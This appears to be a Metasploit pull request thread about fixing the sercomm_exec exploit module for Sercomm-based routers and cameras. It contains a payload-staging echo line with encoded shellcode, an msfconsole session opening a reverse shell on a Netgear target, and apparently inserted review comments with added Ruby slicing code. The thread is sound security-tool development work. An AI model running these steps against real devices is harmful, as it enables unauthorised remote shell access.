Sercomm Exploit module fixes #2874

merged 1 commit into from Jan 16, 2014



4 participants

  • Added targets for 8 specific targets that I've tested: Cisco WAP4410N,
    Honeywell WAP-PL2 IP Camera, Netgear DG834, Netgear DG834G, Netgear
    DG834PN, Netgear DGN1000, Netgear DSG835, Netgear WPNT834
  • Added functionality to the CmdStagerEcho mix-in to support encoding via
    octal instead of hex based on the :enc_type option. This is because many
    devices would not output hex encoded values properly.
  • Added options on a per-target basis for the PackFormat (endian pack()
    values for communication), UploadPath (because /tmp wasn't always
    writable), and PayloadEncode (previously mentioned octal encoding).
  • Note: For some reason, some devices communicate over one endianness, but
    then require a payload for the other endianness. I'm not sure what's
    causing this, but if those specific combinations are not used, the
    exploit fails. More research may be required for this.

Processing it!

@jvazquez-r7 jvazquez-r7 and 2 others commented on an outdated diff Jan 14, 2014
@@ -96,9 +104,16 @@ def slice_up_payload(encoded, opts)
while (encoded_dup.length > 0)
temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
# cut the end of the part until we reach the start
- # of a full byte representation "\\xYZ"
- while (temp.length > 0 && temp[-5, 3] != "\\\\x")
- temp.chop!
+ # of a full byte representation "\\xYZ" or "\\YZ"
+ case opts[:enc_format]
+ when 'octal'
+ while (temp.length > 0 && temp[-4, 2] != "\\\\")
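Review bot: the `when 'octal'` branch at the end of this hunk keeps the fixed-width assumption of the hex code it replaces: `temp[-4, 2] != "\\\\"` accepts a chunk only when its last four characters look like `\\YZ`, but an octal escape without zero padding can be `\\0`, `\\12` or `\\177`, so a three-digit escape at the end of a chunk is cut down to two digits and decodes to a different byte. Suggest testing the boundary against what follows the chunk in `encoded_dup` rather than the chunk's own tail, which is independent of escape width and would serve the hex case too: `while (temp.length > 0 && temp.length < encoded_dup.length && encoded_dup[temp.length, 2] != "\\\\")`. Also, the pull request description calls the option `:enc_type` while the hunk reads `opts[:enc_format]`; one of the two should be corrected. The `hex` branch and the closing `end`s fall outside the visible part of the hunk and are not reviewed here.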
jvazquez-r7 Jan 14, 2014 Contributor

This is a bad assumption: the length of a byte's encoding in the octal output by Rex::Text.to_octal(@exe, "\\\\") isn't always 4. It isn't constant, I mean; look at it:

[*] echo -en \\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\55\\1\\0\\0\\6\\2\\0\\0\\7\\0\\0\\0\\0\\20\\0\\0\\331\\350\\331\\164\\44\\364\\135\\273\\323\\333\\137\\1\\51\\311\\261\\60\\61\\135\\31\\203\\355\\374\\3\\135\\25\\61\\56\\65\\3\\355\\34\\112\\206\\315\\353\\115\\270\\15\\243\\123\\167\\15\\365\\23>>/tmp/sNfSV

So the stager will fail randomly when the length is not enough to store the full payload in just one command and it needs to slice it.

jvazquez-r7 Jan 14, 2014 Contributor

On the other side, there is also Exploit::CmdStagerPrintf, which doesn't use echo but the printf command. It supports octal representation. So I recommend:

  • switch to Exploit::CmdStagerPrintf if it works smoothly with the set of targets you already have available
  • If Exploit::CmdStagerPrintf isn't good enough here, use the same approach as Exploit::CmdStagerPrintf to cut the end of a part when slicing the payload :)
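The slicing problem raised in the two review comments above, as an added example that is not code from the Metasploit Framework or from this pull request. `to_octal_escapes` is a stand-in for `Rex::Text.to_octal` and is assumed to behave as the echo output quoted above shows (unpadded octal digits after a two-backslash prefix); the two slicers mirror the shape of `slice_up_payload` from the hunk but are self-contained. The first slicer carries the fixed-width assumption and produces a chunk that decodes to the wrong byte; the second shrinks each chunk until the remainder begins a new escape, which works for any escape width, and a round-trip decode checks the result.

```ruby
# Added example, not Metasploit code: slicing a string of variable-width
# octal escapes without cutting an escape in half.

PREFIX = "\\\\" # two literal backslashes, as in the quoted "echo -en" line

# Stand-in for Rex::Text.to_octal (assumed behaviour): each byte becomes the
# prefix followed by its octal value with no zero padding, so escapes are
# between 3 and 5 characters long ("\\0" ... "\\177").
def to_octal_escapes(bytes, prefix = PREFIX)
  bytes.each_byte.map { |b| prefix + b.to_s(8) }.join
end

# Decode the escape string back to raw bytes (used for the round-trip check).
def from_octal_escapes(str, prefix = PREFIX)
  str.split(prefix).reject(&:empty?).map { |oct| oct.to_i(8) }.pack("C*")
end

# Slicer with the fixed-width assumption from the hunk under review: a chunk
# is accepted when its last four characters look like "\\YZ".  A three-digit
# escape such as "\\177" at the end of a chunk is truncated to "\\17".
def slice_fixed_width(encoded, linemax, prefix = PREFIX)
  parts = []
  rest = encoded.dup
  while rest.length > 0
    temp = rest.slice(0, linemax)
    temp.chop! while temp.length > 0 && temp[-4, 2] != prefix
    break if temp.empty? # no progress possible; return what was produced
    parts << temp
    rest = rest[temp.length..-1]
  end
  parts
end

# Boundary-aware slicer: shrink the chunk until the text that follows it in
# `rest` starts a new escape, or the chunk consumes all of `rest`.  This does
# not depend on escape width, so it serves hex "\\xYZ" and octal alike.
def slice_on_escape_boundary(encoded, linemax, prefix = PREFIX)
  parts = []
  rest = encoded.dup
  while rest.length > 0
    temp = rest.slice(0, linemax)
    while temp.length > 0 && temp.length < rest.length &&
          rest[temp.length, prefix.length] != prefix
      temp.chop!
    end
    raise ArgumentError, "linemax too small for a single escape" if temp.empty?
    parts << temp
    rest = rest[temp.length..-1]
  end
  parts
end

# Round-trip check: every chunk starts on an escape, fits the line limit, and
# the concatenated chunks decode back to the original bytes.
def slices_ok?(bytes, parts, linemax, prefix = PREFIX)
  parts.all? { |p| p.start_with?(prefix) && p.length <= linemax } &&
    from_octal_escapes(parts.join, prefix) == bytes
end

if __FILE__ == $0
  # Constructed sample: a mix of one-, two- and three-digit octal escapes.
  sample = [0x7f, 0x45, 0x4c, 0x46, 0x01, 0x00, 0x08, 0xd9].pack("C*")
  enc = to_octal_escapes(sample)
  puts enc
  puts "fixed-width slicer round-trips:    #{slices_ok?(sample, slice_fixed_width(enc, 12), 12)}"
  puts "boundary-aware slicer round-trips: #{slices_ok?(sample, slice_on_escape_boundary(enc, 12), 12)}"
end
```

With a 12-character line limit the fixed-width slicer emits `\\177\\10` as its first chunk, turning 0x45 into 0x08, while the boundary-aware slicer emits `\\177\\105`, `\\114\\106`, `\\1\\0\\10` and `\\331`, which join back to the original bytes.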
mandreko Jan 14, 2014 Contributor

Gotcha. I'll have to fix the slicing of the payload. The CmdStagerPrintf doesn't seem to work, as a lot of the busybox installs don't have printf, or when they do, it writes a 0 byte payload.

I'll fix CmdStagerEcho ;)

jvazquez-r7 Jan 14, 2014 Contributor

coolio ! :)

jvennix-r7 Jan 15, 2014 Contributor

This makes me wonder... Maybe some strange versions of echo expect that the hex string collapses the zeroes, "\x1" instead of "\x01"? Crazy, but maybe explains the failures you were seeing.

You could replace the Rex::Text.to_hex(...) call with { |b| sprintf("\\\\x%x", b) }.join to test

mandreko Jan 16, 2014 Contributor

I was manually testing, and even \x41 wasn't working :(


Processing, trying to help with the CmdStagerEcho changes! :)

@jvazquez-r7 jvazquez-r7 referenced this pull request in mandreko/metasploit-framework Jan 16, 2014

Clean CmdStagerEcho and Add module targets #4


Hi @mandreko,

mandreko#4 request tries to clean this pull request by:

  • Cleaning the CmdStagerEcho, and now hopefully it's compatible with all the sercomm module requirements
  • Modifying the sercomm_exec module to add the Netgear N150 target
  • Modifying the sercomm_exec module to add manual targets, where the user can configure the exploitation with advanced options:
    'PACKFORMAT', [false, "Pack Format to use", 'VVV', ['VVV', 'NNN']]),
    'UPLOADPATH', [false, "Remote path to land the payload", "/tmp" ]),
    'NOARGS', [false, "Don't use the echo -en parameters", false ]),
    'ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),

Please feel free to check, review, discuss and land once you're comfortable and have verified it's not breaking anything and all your targets are still working smoothly! :) Thanks a lot!

@mandreko mandreko Merge pull request #4 from jvazquez-r7/review_2874
Clean CmdStagerEcho and Add module targets

Module working here:

msf > use exploit/linux/misc/sercomm_exec 
msf exploit(sercomm_exec) > set rhost
rhost =>
msf exploit(sercomm_exec) > set payload linux/mipsbe/shell_reverse_tcp 
payload => linux/mipsbe/shell_reverse_tcp
msf exploit(sercomm_exec) > set lhost
lhost =>
msf exploit(sercomm_exec) > show options

Module options (exploit/linux/misc/sercomm_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST      yes       The target address
   RPORT  32764            yes       The target port

Payload options (linux/mipsbe/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST      yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Generic Linux MIPS Big Endian

msf exploit(sercomm_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Generic Linux MIPS Big Endian
   1   Generic Linux MIPS Little Endian
   2   Manual Linux MIPS Big Endian
   3   Manual Linux MIPS Little Endian
   4   Cisco WAP4410N
   5   Honeywell WAP-PL2 IP Camera
   6   Netgear DG834
   7   Netgear DG834G
   8   Netgear DG834PN
   9   Netgear DGN1000
   10  Netgear DSG835
   11  Netgear WPNT834

msf exploit(sercomm_exec) > set target 9
target => 9
msf exploit(sercomm_exec) > exploit

[*] Started reverse handler on 
[*] Command shell session 1 opened ( -> at 2014-01-16 16:13:11 -0600
[*] Command Stager progress - 100.00% done (1411/1411 bytes)

//bin/sh: ld: not found

Just giving Travis time to finish its test, then landing! Thanks @mandreko!!!

@jvazquez-r7 jvazquez-r7 added a commit that referenced this pull request Jan 16, 2014
@jvazquez-r7 jvazquez-r7 Land #2874, @mandreko's sercomm exploit fixes ac9e634
@jvazquez-r7 jvazquez-r7 merged commit f6f2da0 into rapid7:master Jan 16, 2014

1 check passed

default The Travis CI build passed
hsqrealm commented Oct 6, 2015

[*] Started reverse handler on ***********
[*] Command Stager progress - 100.00% done (1164/1164 bytes)
msf exploit(sercomm_exec) >

Netgear DG834G is the router I'm trying to send the exploit to.
